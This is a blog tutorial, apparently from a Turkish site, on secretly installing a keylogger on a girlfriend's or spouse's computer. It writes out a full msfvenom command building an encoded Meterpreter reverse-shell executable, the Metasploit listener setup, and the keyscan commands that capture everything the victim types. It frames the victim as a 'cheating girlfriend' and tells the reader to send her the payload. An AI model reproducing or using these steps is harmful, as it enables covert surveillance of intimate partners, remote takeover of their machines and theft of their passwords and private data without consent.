Siber Güvenlik

How To Remotely Install Keylogger on your Girlfriends Computer?

Welcome back, Hackers! Many of you guys have emailed me asking about remotely hacking your victim’s computer. So the answer to this is “YES” it is possible. I have seen a lot of you guys have commented on our website. I’ll show you how to install Keylogger on your Husband’s, Wife’s, Girlfriend’s or Boyfriend’s computer.

For those of you who’s wondering what a Keylogger is?

Keylogger is a piece of software or hardware (Rubber Ducky/Keylogger Hardware) which is capable of capturing every keystrokes and save’s them for your retrieval through FTP, Email or Cloud services. These types of devices can capture logins, passwords, social security numbers etc.

Scenario: How to capture the keystrokes of your cheating girlfriend 

Let’s get started!

How to Remotely Install Keylogger on your Girlfriends Computer?

How To Remotely Install Keylogger on your Girlfriends Computer?
Image Source: wonderhowto.com

What you need?

After installing Metasploit you need to create a Payload. Which you’re going to send your victim!

For that, You need to find your localhost IP Address in your Attacking on LAN network. If you’re going to attack on WAN. (which will not suggest you to do it.) You need to port-forward and find your public IP Address.

For LAN network IP Address. For That

Type:

ifconfig (Mac/Linux)
ipconfig (Windows)

Mine is: 192.168.1.6 And i will use a port 1337 you can use whatever you want.

For creating a Payload you need to follow these commands.

Type:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1337 -b "\x00" -e x86/shikata_ga_nai -f exe -o thehacktoday.exe

Now you have successfully created your payload next we have to Fire up Metasploit which we’ll use to listen to our payload!

Type: 

msfconsole

Now, it’s time to start listening to your payload.

Type: 

use multi/handler

After that setup a payload which we’re going to use.

Type:

set payload windows/shell/reverse_tcp

After that, you need to:

set LHOST 192.168.1.6

set LPORT 1337

Okay, now everything is done! we just need to start listening to an exploit and run that payload thehacktoday.exe which we just generated.

Type:

exploit -j

Okay, now we have to execute that payload on your targeted victim. Or you have to just send it to your victim.

When you open that thehacktoday.exe file you’ll get an instantly open session on msfconsole.

As you can see it opened a session 3 and you can connect to that specific session.

Type:

sessions -i 3

Congratulations! you have successfully hacked your Girlfriend computer 

How to start recording her keystrokes?

Type:

keyscan_start

After starting the scanning whatever she types will be recorded.

How to retrieve the typed data?

Type:

keyscan_dump

That’s all for now! In my next tutorials related to metasploit we’ll discover advance features of metasploit that’s just a basics we just did, Keep supporting us by sharing and commenting and request for more.

SondakikaWorld CEO | Co Founder | Web Developer | Graphic Designer

Tepkiniz nedir?

İlgili Yazılar

1 of 7.565

Cevap bırakın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir